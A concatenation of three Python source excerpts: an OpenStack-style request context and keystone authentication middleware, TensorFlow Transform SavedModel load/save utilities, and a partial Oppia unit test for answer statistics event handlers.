                'username': self.username,
                'user_id': self.user_id,
                'password': self.password,
                'aws_creds': self.aws_creds,
                'tenant': self.tenant,
                'tenant_id': self.tenant_id,
                'trust_id': self.trust_id,
                'trustor_user_id': self.trustor_user_id,
                'auth_token_info': self.auth_token_info,
                'auth_url': self.auth_url,
                'roles': self.roles,
                'is_admin': self.is_admin,
                'user': self.user,
                'request_id': self.request_id,
                'show_deleted': self.show_deleted,
                'region_name': self.region_name,
                'user_identity': user_idt}

    @classmethod
    def from_dict(cls, values):
        """Rebuilds a context from the dict produced by `to_dict`."""
        return cls(**values)

    @property
    def _keystone_v3_endpoint(self):
        # Prefer the auth_url supplied with the request; otherwise fall
        # back to the keystonemiddleware configuration. The module is
        # imported lazily so its config options get registered first.
        if self.auth_url:
            auth_uri = self.auth_url
        else:
            importutils.import_module('keystonemiddleware.auth_token')
            auth_uri = CONF.keystone_authtoken.auth_uri
        return auth_uri.replace('v2.0', 'v3')

    def _create_auth_plugin(self):
        """
        Builds a keystone v3 auth plugin from whatever credentials are
        available, tried in order: trust, token info, bare token,
        password. Raises AuthorizationFailure if none are usable.
        """
        if self.trust_id:
            # Authenticate as the configured service user, scoped to the
            # trust delegated by the end user.
            importutils.import_module('keystonemiddleware.auth_token')
            username = CONF.keystone_authtoken.admin_user
            password = CONF.keystone_authtoken.admin_password
            return v3.Password(username=username,
                               password=password,
                               user_domain_id='default',
                               auth_url=self._keystone_v3_endpoint,
                               trust_id=self.trust_id)
        if self.auth_token_info:
            # Reuse the already-validated token body, avoiding another
            # round-trip to keystone.
            auth_ref = access.AccessInfo.factory(body=self.auth_token_info,
                                                 auth_token=self.auth_token)
            return access_plugin.AccessInfoPlugin(
                auth_url=self._keystone_v3_endpoint,
                auth_ref=auth_ref)
        if self.auth_token:
            # FIXME(jamielennox): This is broken but consistent. If you
            # only have a token but don't load a service catalog then
            # url_for wont work. Stub with the keystone endpoint so at
            # least it might be right.
            return token_endpoint.Token(
                endpoint=self._keystone_v3_endpoint,
                token=self.auth_token
            )
        if self.password:
            return v3.Password(
                username=self.username,
                password=self.password,
                project_name=self.tenant,
                project_id=self.tenant_id,
                user_domain_id='default',
                project_domain_id='default',
                auth_url=self._keystone_v3_endpoint
            )
        LOG.error(
            _LE("Keystone v3 API connection failed, no password "
                "trust or auth_token!")
        )
        raise exception.AuthorizationFailure()

    @property
    def auth_plugin(self):
        # Created lazily on first access and cached for reuse.
        if not self._auth_plugin:
            self._auth_plugin = self._create_auth_plugin()
        return self._auth_plugin
def get_admin_context(show_deleted=False):
    """Returns a RequestContext carrying admin privileges."""
    return RequestContext(show_deleted=show_deleted, is_admin=True)
class ContextMiddleware(wsgi.Middleware):
    """
    WSGI middleware that builds a RequestContext from the incoming
    request's headers and attaches it as ``req.context``.
    """

    def __init__(self, app, conf, **local_conf):
        # Determine the context class to use
        self.ctxcls = RequestContext
        if 'context_class' in local_conf:
            self.ctxcls = importutils.import_class(local_conf['context_class'])
        super(ContextMiddleware, self).__init__(app)

    def make_context(self, *args, **kwargs):
        """
        Create a context with the given arguments.

        :param kwargs:
        :param args:
        """
        return self.ctxcls(*args, **kwargs)

    def process_request(self, req):
        """
        Extract any authentication information in the request and
        construct an appropriate context from it.

        :param req:
        """
        headers = req.headers
        environ = req.environ
        try:
            username = None
            password = None
            aws_creds = None
            # Username/password and EC2-style credentials are mutually
            # exclusive; X-Auth-User takes precedence when both appear.
            if headers.get('X-Auth-User') is not None:
                username = headers.get('X-Auth-User')
                password = headers.get('X-Auth-Key')
            elif headers.get('X-Auth-EC2-Creds') is not None:
                aws_creds = headers.get('X-Auth-EC2-Creds')
            user_id = headers.get('X-User-Id')
            token = headers.get('X-Auth-Token')
            tenant = headers.get('X-Project-Name')
            tenant_id = headers.get('X-Project-Id')
            region_name = headers.get('X-Region-Name')
            auth_url = headers.get('X-Auth-Url')
            roles = headers.get('X-Roles')
            if roles is not None:
                roles = roles.split(',')
            # Values placed in the WSGI environ by keystonemiddleware /
            # oslo.middleware earlier in the pipeline.
            token_info = environ.get('keystone.token_info')
            auth_plugin = environ.get('keystone.token_auth')
            req_id = environ.get(oslo_request_id.ENV_REQUEST_ID)
        except Exception:
            raise exception.NotAuthenticated()
        req.context = self.make_context(
            auth_token=token,
            tenant=tenant,
            tenant_id=tenant_id,
            aws_creds=aws_creds,
            username=username,
            user_id=user_id,
            password=password,
            auth_url=auth_url,
            roles=roles,
            request_id=req_id,
            auth_token_info=token_info,
            region_name=region_name,
            auth_plugin=auth_plugin
        )
        LOG.debug("Context successfully injected")
def ContextMiddleware_filter_factory(global_conf, **local_conf):
    """
    Factory method for paste.deploy

    :param local_conf:
    :param global_conf:
    """
    # Local options override the global paste configuration.
    merged_conf = dict(global_conf)
    merged_conf.update(local_conf)

    def filter(app):
        return ContextMiddleware(app, merged_conf)

    return filter
def request_context(func):
    """
    Decorator that upgrades a serialized context to a RequestContext and
    converts OpenstackException into an RPC ExpectedException.
    """
    @six.wraps(func)
    def wrapped(self, ctx, *args, **kwargs):
        needs_upgrade = (ctx is not None and
                         not isinstance(ctx, context.RequestContext))
        if needs_upgrade:
            ctx = context.RequestContext.from_dict(ctx.to_dict())
        try:
            return func(self, ctx, *args, **kwargs)
        except exception.OpenstackException:
            raise oslo_messaging.rpc.dispatcher.ExpectedException()
    return wrapped
| |
# Copyright 2020 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions to save and load from SavedModels in TF 2.x."""
from typing import Any, Dict, Iterable, Mapping, Tuple, Union
import tensorflow as tf
from tensorflow_transform import annotators
from tensorflow_transform import common_types
from tensorflow_transform import graph_tools
from tensorflow_transform import tf2_utils
from tensorflow_transform import tf_utils
from tensorflow_transform.py_func import pyfunc_helper
from tensorflow_transform.saved import constants
from tensorflow_transform.saved import saved_model_loader
from tensorflow_transform.saved import saved_transform_io
# pylint: disable=g-direct-tensorflow-import
from tensorflow.python.eager import function
from tensorflow.python.eager import wrap_function
from tensorflow.python.framework import composite_tensor
from tensorflow.python.ops import lookup_ops
from tensorflow.python.training.tracking import tracking
from tensorflow.python.util import object_identity
# pylint: enable=g-direct-tensorflow-import
def _restore_from_v1_saved_model(
    restored_function: function.ConcreteFunction, saved_model_dir: str
) -> Tuple[function.ConcreteFunction, Mapping[str, Any], Mapping[
    str, common_types.TensorType]]:
  """Restores an exported TF1 compat SavedModel.

  Args:
    restored_function: Concrete function loaded for the transform signature.
    saved_model_dir: Directory containing the exported SavedModel.

  Returns:
    A tuple of (callable function, input signature map, structured outputs).
  """
  saved_model = saved_model_loader.parse_saved_model(saved_model_dir)
  meta_graph_def = saved_model_loader.choose_meta_graph_def_and_raise(
      saved_model)
  signature = meta_graph_def.signature_def[constants.TRANSFORM_SIGNATURE]
  # Re-register pyfuncs, if any.
  graph_def = pyfunc_helper.register_pyfuncs_from_saved_transform(
      restored_function.graph, meta_graph_def, loaded_in_tf2=True)
  if graph_def is None:
    # No pyfuncs to re-register; the restored function is usable as-is.
    return (restored_function, signature.inputs,
            restored_function.structured_outputs)
  inputs = [t.name for t in restored_function.graph.inputs]
  outputs = [t.name for t in restored_function.graph.outputs]
  # Rebuild the function from the pyfunc-augmented GraphDef, then restore
  # the original output structure (including composite tensors).
  wrapped = wrap_function.function_from_graph_def(graph_def, inputs, outputs)
  structured_outputs = (
      tf.nest.pack_sequence_as(
          restored_function.structured_outputs,
          wrapped.outputs,
          expand_composites=True))
  wrapped = wrapped.prune(wrapped.inputs, structured_outputs)
  return (wrapped, signature.inputs, wrapped.structured_outputs)
def _as_operation(op_or_tensor: Union[tf.Operation, tf.Tensor]) -> tf.Operation:
  """Returns the `tf.Operation` for `op_or_tensor` (producer op if tensor)."""
  is_tensor = isinstance(op_or_tensor, tf.Tensor)
  return op_or_tensor.op if is_tensor else op_or_tensor
def _get_component_tensors(
    tensor: Union[tf.Tensor, composite_tensor.CompositeTensor]
) -> Iterable[tf.Tensor]:
  """Get all component tensors.

  Args:
    tensor: A `Tensor` or `CompositeTensor`.

  Returns:
    All `Tensor` components of `tensor`.

  Raises:
    ValueError if supplied `tensor` parameter is neither a `Tensor` nor a
    `CompositeTensor`.
  """
  # A CompositeTensor is decomposed into its flat components; a plain
  # Tensor is its own single component.
  if isinstance(tensor, composite_tensor.CompositeTensor):
    return tf.nest.flatten(tensor, expand_composites=True)
  if isinstance(tensor, tf.Tensor):
    return [tensor]
  raise ValueError(
      'Unsupported tensor. Arg `tensor` is neither a `Tensor` nor a '
      f'`CompositeTensor`: {tensor}.')
def _get_output_to_inputs_map(
    output_signature: Mapping[str, common_types.TensorType]
) -> Dict[str, Iterable[tf.Tensor]]:
  """Gets all graph inputs that the tensors in output_signature depend on."""

  def _sources_for(output):
    # Ignore control dependencies when walking the graph as we only care
    # about which user defined inputs this output depends on.
    sinks = [_as_operation(c) for c in _get_component_tensors(output)]
    return graph_tools.retrieve_sources(
        sinks, ignore_control_dependencies=True)

  return {name: _sources_for(output)
          for name, output in output_signature.items()}
class SavedModelLoader:
  """Handles a SavedModel exported using TF 1.x APIs in TF 2.x."""

  def __init__(self, saved_model_dir: str):
    """Init method for SavedModelLoader.

    Args:
      saved_model_dir: A SavedModel directory providing a transform graph. The
        MetaGraphDef and signature are selected from the SavedModel using keys
        defined in `../constants.py` ('transform' and 'transform_signature',
        respectively).
    """
    # TODO(b/160294509): Stop using tf.compat.v2 when TF1.15 support is
    # dropped.
    imported = tf.compat.v2.saved_model.load(saved_model_dir)
    # Presence of the TF1 transform signature tells us which export path
    # produced this SavedModel.
    load_v2_in_compat = constants.TRANSFORM_SIGNATURE in imported.signatures
    if load_v2_in_compat:
      restored_function = imported.signatures[constants.TRANSFORM_SIGNATURE]
      wrapped, structured_inputs, structured_outputs = (
          _restore_from_v1_saved_model(restored_function, saved_model_dir))
    else:
      # transform_fn is now a ConcreteFunction, but was a tf.function. We need
      # to handle both to maintain backward compatiblity. If it's a tf.function,
      # since `input_signature` was specified when exporting the tf function to
      # `SavedModel`, there should be exactly one concrete function present on
      # loading the `SavedModel`.
      if hasattr(imported.transform_fn, 'concrete_functions'):
        concrete_functions = imported.transform_fn.concrete_functions
        assert len(concrete_functions) == 1, concrete_functions
        wrapped = concrete_functions[0]
      else:
        wrapped = imported.transform_fn
      func_graph = wrapped.graph
      structured_inputs = (
          tf2_utils.get_structured_inputs_from_func_graph(func_graph))
      structured_outputs = tf.nest.pack_sequence_as(
          func_graph.structured_outputs,
          func_graph.outputs,
          expand_composites=True)
    outputs_to_inputs_map = _get_output_to_inputs_map(structured_outputs)
    self._initialize(load_v2_in_compat, imported, wrapped, structured_inputs,
                     structured_outputs, outputs_to_inputs_map)
    saved_transform_io._maybe_register_addon_ops()  # pylint: disable=protected-access

  def _initialize(self, load_v2_in_compat, imported, wrapped, structured_inputs,
                  structured_outputs, outputs_to_inputs_map):
    """Initializes all class arguments."""
    self._load_v2_in_compat = load_v2_in_compat
    self._imported = imported
    self._wrapped_function = wrapped
    self._func_graph = self._wrapped_function.graph
    self._structured_inputs = structured_inputs
    self._structured_outputs = structured_outputs
    self._output_to_inputs_map = outputs_to_inputs_map
    # Populated by `finalize`; None until then.
    self._sorted_unfed_input_keys = None
    self._wrapped_function_finalized = None
    self._is_finalized = False

  @property
  def load_v2_in_compat(self):
    """Whether the model was exported with the TF1 transform signature."""
    return self._load_v2_in_compat

  @property
  def structured_outputs(self):
    """Structured outputs of the loaded transform function."""
    return self._structured_outputs

  def _get_feeds(self, unfed_input_keys: Iterable[str]) -> Iterable[tf.Tensor]:
    """Returns set of tensors that will be fed."""
    result = object_identity.ObjectIdentitySet(self._func_graph.inputs)
    for input_key in unfed_input_keys:
      unfed_input_components = _get_component_tensors(
          self._structured_inputs[input_key])
      result = result.difference(unfed_input_components)
    return result

  def _get_unfed_input_keys(self,
                            input_tensor_keys: Iterable[str]) -> Iterable[str]:
    # Input keys in the signature that the caller is not supplying.
    return set(self._structured_inputs.keys()).difference(input_tensor_keys)

  def _get_fetches(
      self, feeds: Iterable[tf.Tensor]) -> Dict[str, common_types.TensorType]:
    """Returns set of tensors that can be fetched when `feeds` is supplied."""
    result = {}
    for name, output in self._structured_outputs.items():
      extra_sources = self._output_to_inputs_map[name].difference(feeds)
      # If output does not depend on an input placeholder that is not being fed,
      # add it to fetches.
      if not extra_sources.difference(self._func_graph.internal_captures):
        result[name] = output
    return result

  def _get_fetches_keys(self, feeds: Iterable[tf.Tensor]) -> Iterable[str]:
    """Returns names of outputs computable when `feeds` is supplied."""
    return self._get_fetches(feeds).keys()

  def _get_missing_inputs(
      self, unfed_input_keys: Iterable[str],
      batch_size: int) -> Dict[str, common_types.TensorType]:
    """Supplies inputs for `unfed_input_keys`."""
    result = {}
    if unfed_input_keys:
      result = (
          tf2_utils.supply_missing_inputs(self._structured_inputs, batch_size,
                                          unfed_input_keys))
    return result

  def _apply_v1_transform_model_in_v2(
      self, logical_input_map: Mapping[str, common_types.TensorType]
  ) -> Dict[str, common_types.TensorType]:
    """Applies a V1 transform graph to dictionary of (Composite)Tensors.

    This method applies the transformation graph as a pruned function to the
    `logical_input_map`.
    It prunes the function loaded from the SavedModel to return only outputs
    that can be computed from the keys provided in `logical_input_map`.

    Args:
      logical_input_map: a dict of logical name to Tensor. The logical names
        must be a subset of those in the input signature of the transform graph,
        and the corresponding Tensors must have the expected types and shapes.

    Returns:
      A dict of logical name to Tensor, as provided by the output signature of
      the transform graph.
    """
    input_map = (
        saved_transform_io._expand_input_map(  # pylint: disable=protected-access
            logical_input_map, self._structured_inputs))
    feeds = []
    pruned_input_args = []
    for name in input_map:
      tensor = self._func_graph.get_tensor_by_name(name)
      try:
        tensor.shape.assert_is_compatible_with(input_map[name].shape)
      except ValueError as e:
        raise ValueError('{}: {}'.format(name, e))
      feeds.append(tensor)
      pruned_input_args.append(input_map[name])
    fetches = self._get_fetches(feeds)
    pruned = self._wrapped_function.prune(feeds, fetches)
    result = pruned(*pruned_input_args)
    # TODO(b/163329414): Remove set_shape when calling pruned no longer produces
    # tensors with unknown shapes.
    for name, output in fetches.items():
      if hasattr(result[name], 'set_shape'):
        result[name].set_shape(output.shape)
    return result

  def _format_input_map_as_tensors(self, input_map):
    """Returns a map from string to `tf.Tensor` or `CompositeTensor`."""
    result = {}
    for key, value in input_map.items():
      if isinstance(value, (tf.Tensor, composite_tensor.CompositeTensor)):
        result[key] = value
      else:
        result[key] = tf.convert_to_tensor(value)
    return result

  def _apply_v2_transform_model_finalized(
      self, logical_input_map: Mapping[str, common_types.TensorType]
  ) -> Dict[str, common_types.TensorType]:
    """Applies a V2 transform graph to dictionary of (Composite)Tensors.

    This method applies the transformation graph to the `logical_input_map` to
    return only outputs that can be computed from the keys provided in
    `logical_input_map`. It assumes that self.finalize has been called before
    this method is invoked.

    Args:
      logical_input_map: a dict of logical name to Tensor. The logical names
        must be a subset of those in the input signature of the transform graph,
        and the corresponding Tensors must have the expected types and shapes.

    Returns:
      A dict of logical name to Tensor, as provided by the output signature of
      the transform graph.
    """
    # Assert that the same keys are fed as this model was finalized with.
    unfed_input_keys = self._get_unfed_input_keys(logical_input_map.keys())
    assert sorted(unfed_input_keys) == self._sorted_unfed_input_keys
    modified_inputs = self._format_input_map_as_tensors(logical_input_map)
    return self._wrapped_function_finalized(modified_inputs)

  def _apply_v2_transform_model(
      self, logical_input_map: Mapping[str, common_types.TensorType]
  ) -> Dict[str, common_types.TensorType]:
    """Applies a V2 transform graph to dictionary of (Composite)Tensors.

    This method applies the transformation graph to the `logical_input_map` to
    return only outputs that can be computed from the keys provided in
    `logical_input_map`.

    Args:
      logical_input_map: a dict of logical name to Tensor. The logical names
        must be a subset of those in the input signature of the transform graph,
        and the corresponding Tensors must have the expected types and shapes.

    Returns:
      A dict of logical name to Tensor, as provided by the output signature of
      the transform graph.
    """
    unfed_input_keys = self._get_unfed_input_keys(logical_input_map.keys())
    feeds = self._get_feeds(unfed_input_keys)
    modified_inputs = self._format_input_map_as_tensors(logical_input_map)
    if unfed_input_keys:
      # Infer a batch size from any provided input so that synthetic
      # placeholders for unfed inputs line up with the fed batch.
      batch_size = 1
      if logical_input_map:
        an_input = next(iter(logical_input_map.values()))
        if isinstance(an_input, tf.RaggedTensor):
          batch_size = an_input.bounding_shape(axis=0)
        elif tf.shape(an_input)[0] is not None:
          batch_size = tf.shape(an_input)[0]
      missing_inputs = self._get_missing_inputs(unfed_input_keys, batch_size)
      modified_inputs.update(missing_inputs)
    flattened_inputs = tf.nest.flatten(modified_inputs, expand_composites=True)
    # self._wrapped_function.inputs may be longer than flattened_inputs as it
    # also contains captured inputs. However, we only want the user inputs here
    # so we don't assert equal length.
    for input_t, wrapped_input in zip(flattened_inputs,
                                      self._wrapped_function.inputs):
      try:
        wrapped_input.shape.assert_is_compatible_with(input_t.shape)
      except ValueError as e:
        raise ValueError('{}: {}'.format(input_t, e))
    transformed_features = self._wrapped_function(*flattened_inputs)
    fetches_keys = self._get_fetches_keys(feeds)
    return {key: transformed_features[key] for key in fetches_keys}

  def apply_transform_model(
      self, logical_input_map: Mapping[str, common_types.TensorType]
  ) -> Dict[str, common_types.TensorType]:
    """Applies a transform graph to dictionary of (Composite)Tensors.

    Args:
      logical_input_map: a dict of logical name to Tensor. The logical names
        must be a subset of those in the input signature of the transform graph,
        and the corresponding Tensors must have the expected types and shapes.

    Returns:
      A dict of logical name to Tensor, as provided by the output signature of
      the transform graph.
    """
    unexpected_inputs = (
        set(logical_input_map.keys()) - set(self._structured_inputs.keys()))
    if unexpected_inputs:
      raise ValueError(
          'Unexpected inputs to transform: {}'.format(unexpected_inputs))
    # Dispatch on export style and on whether `finalize` was called.
    if self.load_v2_in_compat:
      return self._apply_v1_transform_model_in_v2(logical_input_map)
    elif self._is_finalized:
      return self._apply_v2_transform_model_finalized(logical_input_map)
    else:
      return self._apply_v2_transform_model(logical_input_map)

  def _finalize_wrapped_function(
      self, unfed_input_keys: Iterable[str],
      fetches_keys: Iterable[str]) -> function.ConcreteFunction:
    """Constructs a function that can be invoked without `unfed_input_keys`."""
    original_input_signature = (
        self._wrapped_function.structured_input_signature[0][0])
    input_signature = {
        k: v
        for k, v in original_input_signature.items()
        if k not in unfed_input_keys
    }

    @tf.function(input_signature=[input_signature], autograph=False)
    def wrapped_finalized(inputs):
      missing_inputs = self._get_missing_inputs(unfed_input_keys, batch_size=1)
      # Directly modifying inputs is not allowed in a tf.function. Hence, we
      # make a deep copy here.
      inputs_copy = tf_utils.copy_tensors(inputs)
      inputs_copy.update(missing_inputs)
      flattened_inputs = tf.nest.flatten(inputs_copy, expand_composites=True)
      transformed_features = self._wrapped_function(*flattened_inputs)
      return {key: transformed_features[key] for key in fetches_keys}

    return wrapped_finalized.get_concrete_function()

  # TODO(b/177672051): Consider calling finalize in the TransformFeaturesLayer.
  def finalize(self, input_tensor_keys: Iterable[str],
               output_tensor_keys: Iterable[str]):
    """Finalizes the set of inputs with which this SavedModel will be called.

    Note: This is not Thread-safe. Should be called prior to any calls to
    `apply_transform_model`.

    Args:
      input_tensor_keys: Set of input keys with which the SavedModel will be
        called.
      output_tensor_keys: Set of output keys that should be returned by the
        SavedModel.
    """
    self._sorted_unfed_input_keys = sorted(
        self._get_unfed_input_keys(input_tensor_keys))
    feeds = self._get_feeds(self._sorted_unfed_input_keys)
    unexpected_outputs = (
        set(output_tensor_keys) - set(self._get_fetches_keys(feeds)))
    if unexpected_outputs:
      raise ValueError(
          'Unexpected output keys requested: {}'.format(unexpected_outputs))
    self._wrapped_function_finalized = self._finalize_wrapped_function(
        self._sorted_unfed_input_keys, sorted(output_tensor_keys))
    self._is_finalized = True
# TODO(b/177606209): Remove once TF supports saving optimized functions.
# TODO(b/169666856): WrappedFunction.prune does not support composite tensors.
# Hence, add additional handling when supporting composite tensors in TFT.
def optimize_concrete_function(
    concrete_function: function.ConcreteFunction,
    strip_control_dependencies: bool) -> wrap_function.WrappedFunction:
  """Returns optimized function with same signature as `concrete_function`.

  Args:
    concrete_function: The concrete function to optimize.
    strip_control_dependencies: If True, automatic control dependencies are
      removed from the fetched outputs before pruning.

  Returns:
    A pruned `WrappedFunction` with the same structured input signature.
  """
  wrapped_fn = wrap_function.WrappedFunction(
      concrete_function.graph,
      variable_holder=wrap_function.VariableHolder(share_variables=True))
  fetches = concrete_function.structured_outputs
  if strip_control_dependencies:
    # Strip control deps from the flattened outputs, then restore the
    # original (possibly composite) output structure.
    flat_outputs, _ = tf2_utils.strip_and_get_tensors_and_control_dependencies(
        tf.nest.flatten(fetches, expand_composites=True))
    fetches = tf.nest.pack_sequence_as(
        concrete_function.structured_outputs,
        flat_outputs,
        expand_composites=True)
  result = wrapped_fn.prune(
      feeds=concrete_function.inputs,
      fetches=fetches,
      input_signature=concrete_function.structured_input_signature)
  # TODO(b/163329414): Remove once `prune` retains shape information for all
  # components.
  for original_out, pruned_out in zip(concrete_function.outputs,
                                      result.outputs):
    pruned_out.set_shape(original_out.get_shape())
  return result
def trace_and_update_module(
    module: tf.Module, tf_function: function.Function, name: str,
    strip_control_dependencies: bool) -> function.ConcreteFunction:
  """Traces `tf_function` and saves under attr `name` of `module`.

  Args:
    module: A saveable module which will contain the traced `tf_function` under
      attr `name`.
    tf_function: A tf.function to trace.
    name: A name to same the traced `tf_function` to.
    strip_control_dependencies: Boolean. If True, automatic control dependencies
      will be stripped from the outputs of `tf_function`. This should almost
      always be False. It is useful only if you want to use the structure of the
      TF graph to perform any graph manipulations.

  Returns:
    The concrete function obtained from tracing `tf_function`.
  """
  resource_tracker = tracking.ResourceTracker()
  object_tracker = annotators.ObjectTracker()
  created_variables = []

  def _variable_creator(next_creator, **kwargs):
    # Record every variable created during tracing so it can be tracked
    # explicitly on `module` below.
    var = next_creator(**kwargs)
    created_variables.append(var)
    return var

  # Trace `tf_function` to gather any resources in it using the
  # resource_tracker. These are then assigned to `module.resources` and tracked
  # before exporting to SavedModel.
  with tracking.resource_tracker_scope(resource_tracker), \
       annotators.object_tracker_scope(object_tracker), \
       tf.variable_creator_scope(_variable_creator):
    concrete_fn = tf_function.get_concrete_function()

  # Prior to 2020/10/08, saving a tf.function with a concrete function signature
  # would ensure that the function was not re-traced in a round-trip to a
  # SavedModel. Since this is no longer the case, we save the concrete function
  # directly.
  if tf.compat.forward_compatible(2020, 10, 8):
    pruned_function = optimize_concrete_function(concrete_fn,
                                                 strip_control_dependencies)
    module.pruned_variables = pruned_function.variables
    setattr(module, name, pruned_function)
  else:
    setattr(module, name, tf_function)

  # Any variables created need to be explicitly tracked.
  module.created_variables = created_variables
  # Resources need to be explicitly tracked.
  module.resources = resource_tracker.resources
  module.trackable_objects = object_tracker.trackable_objects
  # TODO(b/158011374) - Stop explicitly tracking initializers. Tracking the
  # table should be sufficient.
  initializers = []
  for resource in module.resources:
    if isinstance(resource, lookup_ops.InitializableLookupTableBase):
      initializers.append(resource._initializer)  # pylint: disable=protected-access
  module.initializers = initializers
  module.assets = [
      common_types.Asset(asset_filepath) for asset_filepath in
      concrete_fn.graph.get_collection(tf.compat.v1.GraphKeys.ASSET_FILEPATHS)
  ]
  return concrete_fn
def write_v2_saved_model(module: tf.Module, tf_function: function.Function,
                         name: str,
                         saved_model_dir: str) -> function.ConcreteFunction:
  """Writes `tf_function` under attr `name` of `module` to `saved_model_dir`."""
  # Trace first so the traced function (and its resources) are attached to
  # `module` before it is serialized.
  traced_fn = trace_and_update_module(
      module, tf_function, name, strip_control_dependencies=False)
  tf.saved_model.save(module, saved_model_dir)
  return traced_fn
| |
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'Jeremy Emerson'
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import rule_domain
from core.domain import stats_domain
from core.domain import stats_services
import test_utils
class EventHandlerUnitTests(test_utils.GenericTestBase):
    """Test the event handler methods."""

    DEFAULT_RULESPEC_STR = exp_domain.DEFAULT_RULESPEC_STR
    SUBMIT_HANDLER = stats_services.SUBMIT_HANDLER_NAME

    # NOTE: assertEquals is a deprecated alias (removed in Python 3.12);
    # assertEqual is used throughout instead.
    def test_record_state_hit(self):
        """A first hit increments first-entry counts; later hits increment
        subsequent-entry counts. No answers are logged by state hits."""
        stats_services.EventHandler.record_state_hit('eid', 'sname', True)

        counter = stats_domain.StateCounter.get('eid', 'sname')
        self.assertEqual(counter.first_entry_count, 1)
        self.assertEqual(counter.subsequent_entries_count, 0)
        self.assertEqual(counter.resolved_answer_count, 0)
        self.assertEqual(counter.active_answer_count, 0)
        self.assertEqual(counter.total_entry_count, 1)
        self.assertEqual(counter.no_answer_count, 1)

        answer_log = stats_domain.StateRuleAnswerLog.get(
            'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR)
        self.assertEqual(answer_log.answers, {})

        stats_services.EventHandler.record_state_hit('eid', 'sname', False)

        counter = stats_domain.StateCounter.get('eid', 'sname')
        self.assertEqual(counter.first_entry_count, 1)
        self.assertEqual(counter.subsequent_entries_count, 1)
        self.assertEqual(counter.resolved_answer_count, 0)
        self.assertEqual(counter.active_answer_count, 0)
        self.assertEqual(counter.total_entry_count, 2)
        self.assertEqual(counter.no_answer_count, 2)

        answer_log = stats_domain.StateRuleAnswerLog.get(
            'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR)
        self.assertEqual(answer_log.answers, {})

    def test_record_answer_submitted(self):
        """Submitted answers are counted as active and logged per rule;
        a bare state hit afterwards leaves the answer log unchanged."""
        stats_services.EventHandler.record_state_hit('eid', 'sname', True)
        stats_services.EventHandler.record_answer_submitted(
            'eid', 'sname', self.SUBMIT_HANDLER, 'Rule', 'answer')

        counter = stats_domain.StateCounter.get('eid', 'sname')
        self.assertEqual(counter.first_entry_count, 1)
        self.assertEqual(counter.subsequent_entries_count, 0)
        self.assertEqual(counter.total_entry_count, 1)
        self.assertEqual(counter.resolved_answer_count, 0)
        self.assertEqual(counter.active_answer_count, 1)
        self.assertEqual(counter.no_answer_count, 0)

        answer_log = stats_domain.StateRuleAnswerLog.get(
            'eid', 'sname', self.SUBMIT_HANDLER, 'Rule')
        self.assertEqual(answer_log.answers, {'answer': 1})

        stats_services.EventHandler.record_state_hit('eid', 'sname', False)
        stats_services.EventHandler.record_answer_submitted(
            'eid', 'sname', self.SUBMIT_HANDLER, 'Rule', 'answer')

        counter = stats_domain.StateCounter.get('eid', 'sname')
        self.assertEqual(counter.first_entry_count, 1)
        self.assertEqual(counter.subsequent_entries_count, 1)
        self.assertEqual(counter.total_entry_count, 2)
        self.assertEqual(counter.resolved_answer_count, 0)
        self.assertEqual(counter.active_answer_count, 2)
        self.assertEqual(counter.no_answer_count, 0)

        answer_log = stats_domain.StateRuleAnswerLog.get(
            'eid', 'sname', self.SUBMIT_HANDLER, 'Rule')
        self.assertEqual(answer_log.answers, {'answer': 2})

        stats_services.EventHandler.record_state_hit('eid', 'sname', False)

        counter = stats_domain.StateCounter.get('eid', 'sname')
        self.assertEqual(counter.first_entry_count, 1)
        self.assertEqual(counter.subsequent_entries_count, 2)
        self.assertEqual(counter.total_entry_count, 3)
        self.assertEqual(counter.resolved_answer_count, 0)
        self.assertEqual(counter.active_answer_count, 2)
        self.assertEqual(counter.no_answer_count, 1)

        answer_log = stats_domain.StateRuleAnswerLog.get(
            'eid', 'sname', self.SUBMIT_HANDLER, 'Rule')
        self.assertEqual(answer_log.answers, {'answer': 2})

    def test_resolve_answers_for_default_rule(self):
        """Resolving answers moves them from active to resolved; unknown
        or already-resolved answers are ignored."""
        stats_services.EventHandler.record_state_hit('eid', 'sname', True)

        # Submit three answers.
        stats_services.EventHandler.record_answer_submitted(
            'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR,
            'a1')
        stats_services.EventHandler.record_answer_submitted(
            'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR,
            'a2')
        stats_services.EventHandler.record_answer_submitted(
            'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR,
            'a3')

        counter = stats_domain.StateCounter.get('eid', 'sname')
        self.assertEqual(counter.resolved_answer_count, 0)
        self.assertEqual(counter.active_answer_count, 3)

        answer_log = stats_domain.StateRuleAnswerLog.get(
            'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR)
        self.assertEqual(
            answer_log.answers, {'a1': 1, 'a2': 1, 'a3': 1})

        # Nothing changes if you try to resolve an invalid answer.
        stats_services.EventHandler.resolve_answers_for_default_rule(
            'eid', 'sname', self.SUBMIT_HANDLER, ['fake_answer'])
        answer_log = stats_domain.StateRuleAnswerLog.get(
            'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR)
        self.assertEqual(
            answer_log.answers, {'a1': 1, 'a2': 1, 'a3': 1})

        # Resolve two answers.
        stats_services.EventHandler.resolve_answers_for_default_rule(
            'eid', 'sname', self.SUBMIT_HANDLER, ['a1', 'a2'])

